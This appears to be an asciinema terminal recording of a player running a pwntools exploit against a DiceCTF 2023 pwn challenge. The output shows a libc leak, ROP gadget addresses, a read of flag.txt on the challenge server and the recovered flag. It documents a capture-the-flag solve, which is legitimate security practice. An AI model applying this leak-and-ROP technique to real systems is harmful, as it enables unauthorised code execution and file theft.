{"version": 2, "width": 116, "height": 34, "timestamp": 1675548096, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.017163, "o", "\u001b]0;solardebris@theseus:~\u0007"]
[0.022188, "o", "\u001b[?2004h\r\n\u001b[1;38;2;139;233;253msolardebris\u001b[0m on 👾 \u001b[1;38;2;189;147;249mtheseus\u001b[0m \u001b[1;38;2;80;250;123m \u001b[0m\u001b[1;38;2;80;250;123m~\u001b[0m via \u001b[1;38;5;149mC \u001b[0m\u001b[1;38;5;149mv12.2.0\u001b[0m\u001b[1;38;5;149m-\u001b[0m\u001b[1;38;5;149mgcc\u001b[0m\u001b[1;38;5;149m \u001b[0m\r\n\u001b[1;38;2;80;250;123mλ\u001b[0m "]
[2.770833, "o", "c"]
[2.814441, "o", "d"]
[2.916216, "o", " "]
[3.035514, "o", "f"]
[3.119665, "o", "i"]
[3.14117, "o", "t"]
[3.282367, "o", "sec/"]
[3.47539, "o", "c"]
[3.657058, "o", "t"]
[3.737393, "o", "f/"]
[4.446197, "o", "d"]
[4.526629, "o", "i"]
[4.603779, "o", "ce23/"]
[5.568303, "o", "b"]
[5.655084, "o", "o"]
[5.728545, "o", "ppwn/"]
[6.100882, "o", "\r\n\u001b[?2004l\r"]
[6.107701, "o", "\u001b]0;solardebris@theseus:~/fitsec/ctf/dice23/boppwn\u0007"]
[6.116197, "o", "\u001b[?2004h\r\n\u001b[1;38;2;139;233;253msolardebris\u001b[0m on 👾 \u001b[1;38;2;189;147;249mtheseus\u001b[0m \u001b[1;38;2;80;250;123m \u001b[0m\u001b[1;38;2;80;250;123mctf/dice23/boppwn\u001b[0m via \u001b[1;33m \u001b[0m\u001b[1;33mpyenv \u001b[0m\r\n\u001b[1;38;2;80;250;123mλ\u001b[0m "]
[6.378565, "o", "c"]
[6.47707, "o", "l"]
[6.489442, "o", "e"]
[6.536252, "o", "a"]
[6.557238, "o", "r"]
[6.625124, "o", "\r\n\u001b[?2004l\r"]
[6.631663, "o", "\u001b[H\u001b[2J\u001b[3J"]
[6.633356, "o", "\u001b]0;solardebris@theseus:~/fitsec/ctf/dice23/boppwn\u0007"]
[6.644111, "o", "\u001b[?2004h\r\n\u001b[1;38;2;139;233;253msolardebris\u001b[0m on 👾 \u001b[1;38;2;189;147;249mtheseus\u001b[0m \u001b[1;38;2;80;250;123m \u001b[0m\u001b[1;38;2;80;250;123mctf/dice23/boppwn\u001b[0m via \u001b[1;33m \u001b[0m\u001b[1;33mpyenv \u001b[0m\r\n\u001b[1;38;2;80;250;123mλ\u001b[0m "]
[9.079552, "o", "p"]
[9.177901, "o", "y"]
[9.25484, "o", "t"]
[9.322895, "o", "h"]
[9.356691, "o", "o"]
[9.404146, "o", "n"]
[9.488667, "o", " "]
[10.218994, "o", "b"]
[10.305174, "o", "o"]
[10.494684, "o", "p"]
[10.584358, "o", "i"]
[10.679941, "o", "t"]
[10.878952, "o", ".py "]
[11.430953, "o", "R"]
[11.530051, "o", "E"]
[11.542451, "o", "M"]
[11.616648, "o", "O"]
[11.674482, "o", "E"]
[11.693439, "o", "T"]
[12.286396, "o", "\b\u001b[K"]
[12.388541, "o", "\b\u001b[K"]
[12.505464, "o", "T"]
[12.561116, "o", "E"]
[12.825092, "o", "\r\n\u001b[?2004l\r"]
[12.924414, "o", "\u001b[?25l\u001b[?1h\u001b=\u001b[6n"]
[12.928076, "o", "Opening connection to mc.ax on port 30284\u001b[K\r\n"]
[12.928372, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] Opening connection to mc.ax on port 30284\u001b[K\r\n\u001b[J"]
[13.029059, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[13.129622, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[13.230147, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[13.330564, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[13.430974, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[13.53163, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[13.631968, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[13.73258, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[13.832945, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[13.933634, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[14.034133, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[14.134673, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[14.235076, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[14.335695, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[14.436116, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[14.536505, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[14.636961, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[14.737517, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[14.837768, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[14.938356, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[15.038951, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[15.139494, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[15.240078, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[15.340654, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[15.441083, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[15.541833, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[15.642289, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[15.742888, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[15.843245, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[15.943733, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[16.044208, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[16.144677, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[16.245198, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[16.345734, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[16.446108, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[16.546653, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[16.647172, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[16.747628, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[16.848339, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[16.948784, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[17.049395, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[17.149844, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[17.250477, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[17.350897, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[17.451433, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[17.551992, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[17.652635, "o", "\u001b[4;1H[\u001b[1m\u001b[34md\u001b[m] \u001b[5;1H\u001b[J"]
[17.752935, "o", "\u001b[4;1H[\u001b[1m\u001b[34mq\u001b[m] \u001b[5;1H\u001b[J"]
[17.853448, "o", "\u001b[4;1H[\u001b[1m\u001b[34mp\u001b[m] \u001b[5;1H\u001b[J"]
[17.938216, "o", "\u001b[4;5HOpening connection to mc.ax on port 30284: Trying 34.148.238.228\u001b[K\r\n\u001b[J"]
[17.954007, "o", "\u001b[4;1H[\u001b[1m\u001b[34mb\u001b[m] \u001b[5;1H\u001b[J"]
[17.961958, "o", "\u001b[4;5HOpening connection to mc.ax on port 30284: Done\u001b[K\r\n\u001b[J"]
[17.962754, "o", "\u001b[4;1H[\u001b[1m\u001b[32m+\u001b[m] \u001b[5;1H\u001b[J"]
[18.052677, "o", "[\u001b[1m\u001b[34m*\u001b[m] '/home/solardebris/fitsec/ctf/dice23/boppwn/bop'\u001b[K\r\n    Arch:     amd64-64-little\u001b[K\r\n    RELRO:    \u001b[33mPartial RELRO\u001b[m\u001b[K\r\n    Stack:    \u001b[31mNo canary found\u001b[m\u001b[K\r\n    NX:       \u001b[32mNX enabled\u001b[m\u001b[K\r\n    PIE:      \u001b[31mNo PIE (0x400000)\u001b[m\u001b[K\r\n"]
[18.067176, "o", "[\u001b[1m\u001b[34m*\u001b[m] Loaded 14 cached gadgets for './bop'\u001b[K\r\n"]
[18.144413, "o", "[\u001b[1m\u001b[34m*\u001b[m] '/home/solardebris/fitsec/ctf/dice23/boppwn/libc.so.6'\u001b[K\r\n    Arch:     amd64-64-little\u001b[K\r\n    RELRO:    \u001b[33mPartial RELRO\u001b[m\u001b[K\r\n    Stack:    \u001b[32mCanary found\u001b[m\u001b[K\r\n    NX:       \u001b[32mNX enabled\u001b[m\u001b[K\r\n    PIE:      \u001b[32mPIE enabled\u001b[m\u001b[K\r\n"]
[18.168372, "o", "[\u001b[1m\u001b[34m*\u001b[m] printf leak: 0x7f2606847c90\u001b[K\r\n0x61c90\u001b[K\r\n"]
[18.168416, "o", "[\u001b[1m\u001b[34m*\u001b[m] Leaked Libc Base: 0x7f26067e6000\u001b[K\r\n"]
[18.172242, "o", "[\u001b[1m\u001b[34m*\u001b[m] Loaded 196 cached gadgets for './libc.so.6'\u001b[K\r\n"]
[18.177084, "o", "[\u001b[1m\u001b[34m*\u001b[m] Pop rdi: 0x4013d3\u001b[K\r\n[\u001b[1m\u001b[34m*\u001b[m] Pop rsi: 0x4013d1\u001b[K\r\n[\u001b[1m\u001b[34m*\u001b[m] Pop rdx: 0x7f26069458c6\u001b[K\r\n"]
[18.177327, "o", "[\u001b[1m\u001b[34m*\u001b[m] read: 0x7f26068f3fc0\u001b[K\r\n[\u001b[1m\u001b[34m*\u001b[m] Reading in /srv/app/flag.txt\u001b[K\r\n"]
[18.177569, "o", "[\u001b[1m\u001b[34m*\u001b[m] Paused (press any to continue)\u001b[K\r\n"]
[19.248611, "o", "[\u001b[1m\u001b[34m*\u001b[m] Opening /srv/app/flag.txt\u001b[K\r\n"]
[19.262819, "o", "[\u001b[1m\u001b[34m*\u001b[m] Pop rdi: 0x4013d3\u001b[K\r\n[\u001b[1m\u001b[34m*\u001b[m] Pop rsi: 0x4013d1\u001b[K\r\n[\u001b[1m\u001b[34m*\u001b[m] Pop rdx: 0x7f26069458c6\u001b[K\r\n"]
[19.263067, "o", "[\u001b[1m\u001b[34m*\u001b[m] read: 0x7f26068f3fc0\u001b[K\r\n[\u001b[1m\u001b[34m*\u001b[m] Reading in flag\u001b[K\r\n"]
[19.276207, "o", "[\u001b[1m\u001b[34m*\u001b[m] Switching to interactive mode\u001b[K\r\n"]
[19.276553, "o", " "]
[19.276718, "o", "\u001b[1m\u001b[31m$\u001b[m "]
[19.276754, "o", "\u001b[34;4H\u001b[7m \u001b[m\u001b[J"]
[19.297923, "o", "\u001b[34;2Hdice{ba_da_ba_da_ba_be_bop_bop_bodda_bope_f8a01d8ec4e2}\u001b[K\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[19.298959, "o", "\u001b[34;1H[\u001b[1m\u001b[34m*\u001b[m] Got EOF while reading in interactive\u001b[K\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[20.933298, "o", "\u001b[34;3H\u001b[K\r\n\u001b[J"]
[20.934501, "o", "\u001b[?12l\u001b[?25h\u001b[?1l\u001b> \b[\u001b[1m\u001b[34m*\u001b[m] Closed connection to mc.ax port 30284\u001b[K\r\n"]
[20.97121, "o", "\u001b]0;solardebris@theseus:~/fitsec/ctf/dice23/boppwn\u0007"]
[20.977717, "o", "\u001b[?2004h\r\n\u001b[1;38;2;139;233;253msolardebris\u001b[0m on 👾 \u001b[1;38;2;189;147;249mtheseus\u001b[0m \u001b[1;38;2;80;250;123m \u001b[0m\u001b[1;38;2;80;250;123mctf/dice23/boppwn\u001b[0m via \u001b[1;33m \u001b[0m\u001b[1;33mpyenv \u001b[0mtook \u001b[1;38;2;241;250;140m8s\u001b[0m \r\n\u001b[1;38;2;80;250;123mλ\u001b[0m "]
[23.235934, "o", "\u001b[?2004l\r\r\n"]
[23.235981, "o", "exit\r\n"]
